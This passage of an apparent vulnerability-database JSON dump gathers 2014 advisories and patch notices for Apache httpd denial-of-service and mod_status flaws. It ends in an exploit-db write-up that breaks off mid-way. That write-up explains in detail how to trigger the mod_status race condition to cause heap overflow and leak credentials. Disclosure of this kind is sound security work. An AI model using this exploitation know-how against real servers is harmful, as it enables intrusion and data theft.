FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.27-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.27-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.27-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.27-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.27-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.27-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.10-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.10-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.10-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.10-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.10-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.10-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\nc79e696c379625efd18e6414f30dba80 httpd-2.2.27-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n28be181b3a0aae494371279230f190e9 httpd-2.2.27-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\nfc409fff4d79cb1969a40756f8a9f576 httpd-2.2.27-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n07ab0f3337fc15656cd2e841c9b0eba4 httpd-2.2.27-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\nb5cefd8903745aceaa68b482cb63e4e2 httpd-2.2.27-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n610a33703e7f84fd14f09bc9529c1cd5 httpd-2.2.27-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nd6dedc1064a6a4d039b188fed02de89b httpd-2.4.10-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n7d150bf3bd558bf70ea2c21a08a1b5b7 httpd-2.4.10-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n7e9b03930b0452a95595a61cf1b093d8 httpd-2.4.10-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nefc9893a3428d87a8d78787fbde793e0 httpd-2.4.10-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n1ac5a4cc6275c8f7cfa6e3a77a27f2db n/httpd-2.4.10-i486-1.txz\n\nSlackware x86_64 -current package:\n7fa5fda601a324238f5a2768204a7476 n/httpd-2.4.10-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.10-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2014-07-23T18:35:41", "published": "2014-07-23T18:35:41", "id": "SSA-2014-204-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.616658", "title": "httpd", "type": "slackware", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "unix", "description": "\nApache HTTP SERVER PROJECT reports:\n\nmod_proxy: Fix crash in Connection header handling which allowed a\n\t denial of service attack against a reverse proxy with a threaded MPM.\nFix a race condition in scoreboard handling, which could lead to a\n\t heap buffer overflow.\nmod_deflate: The DEFLATE input filter (inflates request bodies) now\n\t limits the length and compression ratio of inflated request bodies to avoid\n\t denial of sevice via highly compressed bodies. See directives\n\t DeflateInflateLimitRequestBody, DeflateInflateRatioLimit,\n\t and DeflateInflateRatioBurst.\nmod_cgid: Fix a denial of service against CGI scripts that do\n\t not consume stdin that could lead to lingering HTTPD child processes\n\t filling up the scoreboard and eventually hanging the server. By\n\t default, the client I/O timeout (Timeout directive) now applies to\n\t communication with scripts. The CGIDScriptTimeout directive can be\n\t used to set a different timeout for communication with scripts.\n\n", "modified": "2014-07-15T00:00:00", "published": "2014-07-15T00:00:00", "id": "4364E1F1-0F44-11E4-B090-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/4364e1f1-0f44-11e4-b090-20cf30e32f6d.html", "title": "apache24 -- several vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "unix", "description": "\nApache HTTP SERVER PROJECT reports:\n\n mod_deflate: The DEFLATE input filter (inflates request bodies) now\n\t limits the length and compression ratio of inflated request bodies to\n\t avoid denial of service via highly compressed bodies. See directives\n\t DeflateInflateLimitRequestBody, DeflateInflateRatioLimit, and\n\t DeflateInflateRatioBurst.\nmod_cgid: Fix a denial of service against CGI scripts that do not consume\n\t stdin that could lead to lingering HTTPD child processes filling up the\n\t scoreboard and eventually hanging the server. By default, the client I/O\n\t timeout (Timeout directive) now applies to communication with scripts. The\n\t CGIDScriptTimeout directive can be used to set a different timeout for\n\t communication with scripts.\nFix a race condition in scoreboard handling, which could lead to a heap\n\t buffer overflow.\ncore: HTTP trailers could be used to replace HTTP headers late during\n\t request processing, potentially undoing or otherwise confusing modules\n\t that examined or modified request headers earlier. Adds \"MergeTrailers\"\n\t directive to restore legacy behavior.\n\n", "modified": "2014-09-03T00:00:00", "published": "2014-07-19T00:00:00", "id": "F927E06C-1109-11E4-B090-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/f927e06c-1109-11e4-b090-20cf30e32f6d.html", "title": "apache22 -- several vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "description": "mod_status buffer overflow, mod_proxy, mod_deflate, mod_cgid DoS.", "modified": "2014-07-28T00:00:00", "published": "2014-07-28T00:00:00", "id": "SECURITYVULNS:VULN:13888", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13888", "title": "Apache multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2299-1\r\nJuly 23, 2014\r\n\r\napache2 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in Apache HTTP Server.\r\n\r\nSoftware Description:\r\n- apache2: Apache HTTP server\r\n\r\nDetails:\r\n\r\nMarek Kroemeke discovered that the mod_proxy module incorrectly handled\r\ncertain requests. A remote attacker could use this issue to cause the\r\nserver to stop responding, leading to a denial of service. This issue only\r\naffected Ubuntu 14.04 LTS. (CVE-2014-0117)\r\n\r\nGiancarlo Pellegrino and Davide Balzarotti discovered that the mod_deflate\r\nmodule incorrectly handled body decompression. A remote attacker could use\r\nthis issue to cause resource consumption, leading to a denial of service.\r\n(CVE-2014-0118)\r\n\r\nMarek Kroemeke and others discovered that the mod_status module incorrectly\r\nhandled certain requests. A remote attacker could use this issue to cause\r\nthe server to stop responding, leading to a denial of service, or possibly\r\nexecute arbitrary code. (CVE-2014-0226)\r\n\r\nRainer Jung discovered that the mod_cgid module incorrectly handled certain\r\nscripts. A remote attacker could use this issue to cause the server to stop\r\nresponding, leading to a denial of service. (CVE-2014-0231)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.04 LTS:\r\n apache2-bin 2.4.7-1ubuntu4.1\r\n\r\nUbuntu 12.04 LTS:\r\n apache2.2-bin 2.2.22-1ubuntu1.7\r\n\r\nUbuntu 10.04 LTS:\r\n apache2.2-bin 2.2.14-5ubuntu8.14\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2299-1\r\n CVE-2014-0117, CVE-2014-0118, CVE-2014-0226, CVE-2014-0231\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apache2/2.4.7-1ubuntu4.1\r\n https://launchpad.net/ubuntu/+source/apache2/2.2.22-1ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apache2/2.2.14-5ubuntu8.14\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "modified": "2014-07-28T00:00:00", "published": "2014-07-28T00:00:00", "id": "SECURITYVULNS:DOC:30950", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30950", "title": "[USN-2299-1] Apache HTTP Server vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:11", "bulletinFamily": "bugbounty", "bounty": 80.0, "description": "###Issue Description\nThe researcher identified that the remote host is vulnerable to several denial of service vulnerabilities, however due to the nature of these issues the researcher did not attempt to generate a proof of concept. The information about these issues is based upon the version of apache that is running on the affected host being outdated.\nAdditionally it was noted that the affected host displays the default suse apache test page when visited over http or https as shown:\n\n{F118343}\n\nFrom the screencap it can clearly be seen that the test page is displayed. It was noted that there are several publicly available exploits for the vulnerabilities in this version of apache.\n\n###Response\n\n curl -I http://dolph2.booztx.com\n HTTP/1.1 403 Forbidden\n Date: Thu, 08 Sep 2016 15:18:14 GMT\n Server: Apache/2.2.15 (SuSE)\n Accept-Ranges: bytes\n Content-Length: 4002\n Connection: close\n Content-Type: text/html; charset=UTF-8\n\nFrom the response it can be seen that the version of apache running on the server is 2.2.15 (SuSE) which on further inspection was found to be vulnerable to the following CVEs based upon the version number:\n\n|CVE ID |\tRisk Score|\n| ----- | ------------|\n|[CVE-2013-5704](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2013-5704)\t|5.0 |\n|[CVE-2014-0118](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-0118)\t|4.3 |\n|[CVE-2014-0226](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-0226)\t|6.8 |\n|[CVE-2014-0231](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-0231)\t|5 |\n\n\nFrom the CVEs in the table the following descriptions\n\n- The 'mod_headers' module contains an issue which could enable a remote attacker to inject arbitrary headers. This can be done by placing a header in the trailer portion of data being sent using chunked transfer encoding. (CVE-2013-5704)\n- The 'mod_deflate' module has an issue when handling highly compressed bodies. Using a specially crafted request, a remote attacker can exploit this to cause a denial of service by exhausting memory and CPU resources. (CVE-2014-0118)\n- The 'mod_status' module contains a race condition that can be triggered when handling the scoreboard. A remote attacker can exploit this to cause a denial of service, execute arbitrary code, or obtain sensitive credential information. (CVE-2014-0226)\n- The 'mod_cgid' module lacks a timeout mechanism. Using a specially crafted request, a remote attacker can use this flaw to cause a denial of service by causing child processes to linger indefinitely, eventually filling up the scoreboard. (CVE-2014-0231)\n\nThese issues were deemed the most high risk from the CVEs that affect the installed version, if Boozt are interested the consultant can provide a full list of CVEs that affect this version. \n\n###Affected URLs\n- dolph2.booztx.com\n \n###Risk Breakdown\nRisk: **High**\nDifficulty to Exploit: **Medium** \nAuthentication: **None**\n\n\n###Recommended Fix \nUpdate to the latest version of apache for SUSE which at the time of writing is [2.4](https://doc.opensuse.org/documentation/leap/reference/html/book.opensuse.reference/cha.apache2.html) additionally the server should be hardened to not disclose the version as can be seen in the example below:\n\nOpen `httpd.conf` in an editor, and change the following options:\n\n Header unset Server\n \n ServerSignature Off\n ServerTokens Prod\n\nAlso the default index page should be replaced with either a blank page or adapt the permissions of the domain to return 404/403 pages. For more information please see the apache [docs](http://httpd.apache.org/docs/2.4/mod/core.html#serversignature).", "modified": "2016-09-14T08:27:21", "published": "2016-09-08T15:44:15", "id": "H1:166871", "href": "https://hackerone.com/reports/166871", "type": "hackerone", "title": "Boozt Fashion AB: Instance of Apache Vulnerable to Several Issues", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T00:39:17", "bulletinFamily": "bugbounty", "bounty": 500.0, "description": "A resource consumption flaw was found in mod_deflate. If request body decompression was configured (using the \"DEFLATE\" input filter), a remote attacker could cause the server to consume significant memory and/or CPU resources. The use of request body decompression is not a common configuration.\n\nAcknowledgements: This issue was reported by Giancarlo Pellegrino and Davide Balzarotti\n\nResolved in Apache httpd 2.4.10-dev: http://httpd.apache.org/security/vulnerabilities_24.html\n", "modified": "2014-07-14T00:00:00", "published": "2014-02-19T00:00:00", "id": "H1:20861", "href": "https://hackerone.com/reports/20861", "type": "hackerone", "title": "Apache httpd (IBB): moderate: mod_deflate denial of service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "description": "### Background\n\nApache HTTP Server is one of the most popular web servers on the Internet. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache HTTP Server. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-2.2.29\"", "modified": "2015-04-19T00:00:00", "published": "2015-04-11T00:00:00", "id": "GLSA-201504-03", "href": "https://security.gentoo.org/glsa/201504-03", "type": "gentoo", "title": "Apache: Multiple vulnerabilities", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:47", "bulletinFamily": "unix", "description": "[2.4.6-18.0.1.el7_0]\n- replace index.html with Oracle's index page oracle_index.html\n[2.4.6-18]\n- mod_cgid: add security fix for CVE-2014-0231 (#1120607)\n- mod_proxy: add security fix for CVE-2014-0117 (#1120607)\n- mod_deflate: add security fix for CVE-2014-0118 (#1120607)\n- mod_status: add security fix for CVE-2014-0226 (#1120607)\n- mod_cache: add secutiry fix for CVE-2013-4352 (#1120607)", "modified": "2014-07-23T00:00:00", "published": "2014-07-23T00:00:00", "id": "ELSA-2014-0921", "href": "http://linux.oracle.com/errata/ELSA-2014-0921.html", "title": "httpd security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:11", "bulletinFamily": "unix", "description": "[2.4.6-22.0.1.el6]\n- remove enable-tlsv1x-thunks to fit openssl 1.x api\n- replace index.html with Oracle's index page oracle_index.html\n- update vstring in specfile\n[2.4.6-22]\n- Remove mod_proxy_fcgi fix for heap-based buffer overflow,\n httpd-2.4.6 is not affected (CVE-2014-3583)\n[2.4.6-21]\n- mod_proxy_wstunnel: Fix the use of SSL with the 'wss:' scheme (#1141950)\n[2.4.6-20]\n- core: fix bypassing of mod_headers rules via chunked requests (CVE-2013-5704)\n- mod_cache: fix NULL pointer dereference on empty Content-Type (CVE-2014-3581)\n- mod_proxy_fcgi: fix heap-based buffer overflow (CVE-2014-3583)\n[2.4.6-19]\n- mod_cgid: add security fix for CVE-2014-0231\n- mod_proxy: add security fix for CVE-2014-0117\n- mod_deflate: add security fix for CVE-2014-0118\n- mod_status: add security fix for CVE-2014-0226\n- mod_cache: add secutiry fix for CVE-2013-4352", "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2014-1972", "href": "http://linux.oracle.com/errata/ELSA-2014-1972.html", "title": "httpd24-httpd security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:49", "bulletinFamily": "unix", "description": "Marek Kroemeke discovered that the mod_proxy module incorrectly handled certain requests. A remote attacker could use this issue to cause the server to stop responding, leading to a denial of service. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-0117)\n\nGiancarlo Pellegrino and Davide Balzarotti discovered that the mod_deflate module incorrectly handled body decompression. A remote attacker could use this issue to cause resource consumption, leading to a denial of service. (CVE-2014-0118)\n\nMarek Kroemeke and others discovered that the mod_status module incorrectly handled certain requests. A remote attacker could use this issue to cause the server to stop responding, leading to a denial of service, or possibly execute arbitrary code. (CVE-2014-0226)\n\nRainer Jung discovered that the mod_cgid module incorrectly handled certain scripts. A remote attacker could use this issue to cause the server to stop responding, leading to a denial of service. (CVE-2014-0231)", "modified": "2014-07-23T00:00:00", "published": "2014-07-23T00:00:00", "id": "USN-2299-1", "href": "https://usn.ubuntu.com/2299-1/", "title": "Apache HTTP Server vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "httpd": [{"lastseen": "2019-05-29T19:19:10", "bulletinFamily": "software", "description": "\nA resource consumption flaw was found in mod_deflate. If request body\ndecompression was configured (using the \"DEFLATE\" input filter), a\nremote attacker could cause the server to consume significant memory \nand/or CPU resources. The use of request body decompression is not a common\nconfiguration.\n", "modified": "2014-07-14T00:00:00", "published": "2014-02-19T00:00:00", "id": "HTTPD:4979B5C50BFE930EB922EF4650B13100", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_deflate denial of service", "type": "httpd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nA resource consumption flaw was found in mod_deflate. If request body\ndecompression was configured (using the \"DEFLATE\" input filter), a\nremote attacker could cause the server to consume significant memory \nand/or CPU resources. The use of request body decompression is not a common\nconfiguration.\n", "modified": "2014-09-03T00:00:00", "published": "2014-02-19T00:00:00", "id": "HTTPD:B59ABFE21648992992E0F3E6F9B79EC6", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.29: mod_deflate denial of service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nA resource consumption flaw was found in mod_deflate. If request body\ndecompression was configured (using the \"DEFLATE\" input filter), a\nremote attacker could cause the server to consume significant memory \nand/or CPU resources. The use of request body decompression is not a common\nconfiguration.\n", "modified": "2014-07-14T00:00:00", "published": "2014-02-19T00:00:00", "id": "HTTPD:A46DC391ADD17CB8CA52B09A7D4194CD", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.4.10: mod_deflate denial of service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nA race condition was found in mod_status. An attacker able to access\na public server status page on a server using a threaded MPM could send a\ncarefully crafted request which could lead to a heap buffer overflow. Note\nthat it is not a default or recommended configuration to have a public\naccessible server status page.\n", "modified": "2014-09-03T00:00:00", "published": "2014-05-30T00:00:00", "id": "HTTPD:E3EA50E892151D4F57BF7B9A57DDA94D", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.29: mod_status buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T19:19:10", "bulletinFamily": "software", "description": "\nA race condition was found in mod_status. An attacker able to access\na public server status page on a server using a threaded MPM could send a\ncarefully crafted request which could lead to a heap buffer overflow. Note\nthat it is not a default or recommended configuration to have a public\naccessible server status page.\n", "modified": "2014-07-14T00:00:00", "published": "2014-05-30T00:00:00", "id": "HTTPD:21BDE4F434D5052BD4CA91E0C09D07D2", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_status buffer overflow", "type": "httpd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nA race condition was found in mod_status. An attacker able to access\na public server status page on a server using a threaded MPM could send a\ncarefully crafted request which could lead to a heap buffer overflow. Note\nthat it is not a default or recommended configuration to have a public\naccessible server status page.\n", "modified": "2014-07-14T00:00:00", "published": "2014-05-30T00:00:00", "id": "HTTPD:6F38DA367086990E883C7F7B4D5E5DBB", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.4.10: mod_status buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nA flaw was found in mod_cgid. If a server using mod_cgid hosted CGI\nscripts which did not consume standard input, a remote attacker could\ncause child processes to hang indefinitely, leading to denial of\nservice.\n", "modified": "2014-09-03T00:00:00", "published": "2014-06-16T00:00:00", "id": "HTTPD:5FF970F5C0AD6104342E6861C3AF5222", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.29: mod_cgid denial of service", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:11", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache HTTPD server. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory with several requests to endpoints with handler server-status and other endpoints. By abusing this flaw, an attacker can possibly disclose credentials or leverage this situation to achieve remote code execution.", "modified": "2014-11-09T00:00:00", "published": "2014-07-16T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-236", "id": "ZDI-14-236", "title": "Apache httpd mod_status Heap Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T20:33:50", "bulletinFamily": "exploit", "description": "Apache 2.4.7 mod_status Scoreboard Handling Race Condition. CVE-2014-0226. Dos exploit for linux platform", "modified": "2014-07-21T00:00:00", "published": "2014-07-21T00:00:00", "id": "EDB-ID:34133", "href": "https://www.exploit-db.com/exploits/34133/", "type": "exploitdb", "title": "Apache 2.4.7 mod_status Scoreboard Handling Race Condition", "sourceData": "--[ 0. Sparse summary\r\nRace condition between updating httpd's \"scoreboard\" and mod_status,\r\nleading to several critical scenarios like heap buffer overflow with\r\nuser\r\nsupplied payload and leaking heap which can leak critical memory\r\ncontaining\r\nhtaccess credentials, ssl certificates private keys and so on.\r\n--[ 1. Prerequisites\r\n\r\nApache httpd compiled with MPM event or MPM worker.\r\nThe tested version was 2.4.7 compiled with:\r\n\r\n ./configure --enable-mods-shared=reallyall --with-included-apr\r\n\r\nThe tested mod_status configuration in httpd.conf was:\r\n SetHandler server-status\r\n ExtendedStatus On\r\n--[ 2. Race Condition\r\n\r\nFunction ap_escape_logitem in server/util.c looks as follows:\r\n\r\n 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char\r\n*str)\r\n 1909{\r\n 1910 char *ret;\r\n 1911 unsigned char *d;\r\n 1912 const unsigned char *s;\r\n 1913 apr_size_t length, escapes = 0;\r\n 1914\r\n 1915 if (!str) {\r\n 1916 return NULL;\r\n 1917 }\r\n 1918\r\n 1919 /* Compute how many characters need to be escaped */\r\n 1920 s = (const unsigned char *)str;\r\n 1921 for (; *s; ++s) {\r\n 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {\r\n 1923 escapes++;\r\n 1924 }\r\n 1925 }\r\n 1926\r\n 1927 /* Compute the length of the input string, including NULL\r\n*/\r\n 1928 length = s - (const unsigned char *)str + 1;\r\n 1929\r\n 1930 /* Fast path: nothing to escape */\r\n 1931 if (escapes == 0) {\r\n 1932 return apr_pmemdup(p, str, length);\r\n 1933 }\r\n\r\nIn the for-loop between 1921 and 1925 lines function is computing the\r\nlength of\r\nsupplied str (almost like strlen, but additionally it counts special\r\ncharacters\r\nwhich need to be escaped). As comment in 1927 value says, function\r\ncomputes count\r\nof bytes to copy. If there's nothing to escape function uses\r\napr_pmemdup to duplicate\r\nthe str. In our single-threaded mind everything looks good, but tricky\r\npart starts\r\nwhen we introduce multi-threading. Apache in MPM mode runs workers as\r\nthreads, let's\r\nconsider the following scenario:\r\n\r\n 1) ap_escape_logitem(pool, \"\") is called\r\n 2) for-loop in 1921 line immediately escapes, because *s is in\r\nfirst loop run\r\n 3) malicious thread change memory under *s to another value\r\n(something which is not )\r\n 4) apr_pmemdup copies that change value to new string and returns\r\nit\r\n\r\nOutput from the ap_escape_logitem is considered to be a string, if\r\nscenario above would occur,\r\nthen returned string would not be zeroed at the end, which may be\r\nharmful. The mod_status\r\ncode looks as follows:\r\n\r\n 833 ap_rprintf(r, \"%s%s\"\r\n 834 \"%snn\",\r\n 835 ap_escape_html(r->pool,\r\n 836 \r\nws_record->client),\r\n 837 ap_escape_html(r->pool,\r\n 838 \r\nws_record->vhost),\r\n 839 ap_escape_html(r->pool,\r\n 840 \r\nap_escape_logitem(r->pool,\r\n 841 \r\nws_record->request)));\r\n\r\nThe relevant call to ap_escape_html() is at line 839 after the\r\nevaluation of ap_escape_logitem().\r\nThe first argument passed to the ap_escape_logitem() is in fact an apr\r\npool associated with\r\nthe HTTP request and defined in the request_rec structure.\r\n\r\nThis code is a part of a larger for-loop where code is iterating over\r\nworker_score structs which is\r\ndefined as follows:\r\n\r\n 90struct worker_score {\r\n 91#if APR_HAS_THREADS\r\n 92 apr_os_thread_t tid;\r\n 93#endif\r\n 94 int thread_num;\r\n 95 /* With some MPMs (e.g., worker), a worker_score can\r\nrepresent\r\n 96 * a thread in a terminating process which is no longer\r\n 97 * represented by the corresponding process_score. These\r\nMPMs\r\n 98 * should set pid and generation fields in the worker_score.\r\n 99 */\r\n 100 pid_t pid;\r\n 101 ap_generation_t generation;\r\n 102 unsigned char status;\r\n 103 unsigned short conn_count;\r\n 104 apr_off_t conn_bytes;\r\n 105 unsigned long access_count;\r\n 106 apr_off_t bytes_served;\r\n 107 unsigned long my_access_count;\r\n 108 apr_off_t my_bytes_served;\r\n 109 apr_time_t start_time;\r\n 110 apr_time_t stop_time;\r\n 111 apr_time_t last_used;\r\n 112#ifdef HAVE_TIMES\r\n 113 struct tms times;\r\n 114#endif\r\n 115 char client[40]; /* Keep 'em small... but large\r\nenough to hold an IPv6 address */\r\n 116 char request[64]; /* We just want an idea... */\r\n 117 char vhost[32]; /* What virtual host is being\r\naccessed? */\r\n 118};\r\n\r\nThe 'request' field in a worker_score structure is particularly\r\ninteresting - this field can be changed inside\r\nthe copy_request function, which is called by the\r\nupdate_child_status_internal. This change may occur when the\r\nmod_status is iterating over the workers at the same time the\r\nap_escape_logitem is called within a different\r\nthread, leading to a race condition. We can trigger this exact\r\nscenario in order to return a string without a\r\ntrailing . This can be achived by running two clients, one triggering\r\nthe mod_status handler and second\r\nsending random requests to the web server. Let's consider the\r\nfollowing example:\r\n\r\n 1) the mod_status iterates over workers invoking\r\nupdate_child_status_internal()\r\n 2) at some point for one worker mod_status calls\r\nap_escape_logitem(pool, ws_record->request)\r\n 3) let's asume that ws_record->request at the beginning is \"\"\r\nliterally at the first byte.\r\n 4) inside the ap_escape_logitem function the length of the\r\nws_record->request is computed, which is 1\r\n (an empty string consisting of )\r\n 5) another thread modifies ws_record->request (in fact it's called\r\nws->request in update_child_status_internal\r\n function but it's exactly the same location in memory) and puts\r\nthere i.e. \"GET / HTTP/1.0\"\r\n 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the\r\nfirst one byte from \"GET / HTTP/1.0\" - \"G\" in\r\n that case and returns it. The ap_pmemdup looks as follows:\r\n\r\n 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void\r\n*m, apr_size_t 